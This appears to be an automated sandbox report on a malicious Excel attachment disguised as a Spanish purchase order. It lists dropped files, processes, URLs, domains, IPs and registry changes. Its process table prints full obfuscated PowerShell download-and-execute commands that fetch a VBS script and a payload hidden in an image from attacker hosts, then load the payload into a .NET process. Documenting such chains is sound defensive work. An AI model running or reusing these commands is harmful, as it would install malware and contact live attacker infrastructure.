Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 19 13:01:02 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\~DFC601DD9C0FBA6613.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx
|
data
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11E2C553.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\883E1738.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B755764F.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB16081A.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2hj44iz0.hsm.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4s3ntpk1.fz4.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx
|
Microsoft Excel 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES6826.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:50:07 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bgrhzi3g.hdl.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\e42ly0jz.jlc.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\htbay350.5by.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\kw1juh5f.dvh.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qn1vb4c0.vwb.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ug2kumtg.szq.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF1E87EF4C543DF07F.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFA189BEBEAD81AD87.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\62A30000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:50:19 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\62A30000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\Env#U00edo de Orden de Compra No. 43456435344657.xla.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:50:19 2024, Security: 1
|
dropped
|
There are 25 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX
bYPAsS -noP -W 1
-c DEvIceCrEdenTialdEPLoyment.Exe ;
INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t
= [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex
= Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex
-g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command
= Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray()
59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly
= [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null,
@(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m,
F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)|
.((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp"
"c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP"
|
||
|
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
|
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://1017.filemail.com/api/file/get?filekey=2
|
unknown
|
|
|
|
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta
|
192.3.22.13
|
|
|
|
http://192.3.22.13/352/WRFFRF.txt
|
192.3.22.13
|
|
|
|
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF
|
192.3.22.13
|
|
|
|
https://1017.filemail.com/api/file/get?filek
|
unknown
|
|
|
|
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
|
unknown
|
||
|
http://192.3.22.13/xampp/se/seet
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://provit.uk/wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation
|
198.244.140.41
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://provit.uk/
|
unknown
|
||
|
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
|
142.215.209.78
|
||
|
https://1017.filemail.com
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
https://provit.uk/v
|
unknown
|
||
|
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htarisationM
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdll
|
unknown
|
||
|
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFC:
|
unknown
|
||
|
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFp
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
https://provit.uk/b
|
unknown
|
||
|
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta...p
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta;
|
unknown
|
||
|
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htahttp://192.3.22.13/
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htaAcC:
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://192.3.22.13/
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 30 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
provit.uk
|
198.244.140.41
|
||
|
ip-api.com
|
208.95.112.1
|
||
|
ip.1017.filemail.com
|
142.215.209.78
|
||
|
1017.filemail.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.22.13
|
unknown
|
United States
|
|
|
|
142.215.209.78
|
ip.1017.filemail.com
|
Canada
|
||
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
198.244.140.41
|
provit.uk
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
v%/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
,+/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3B3F4
|
3B3F4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
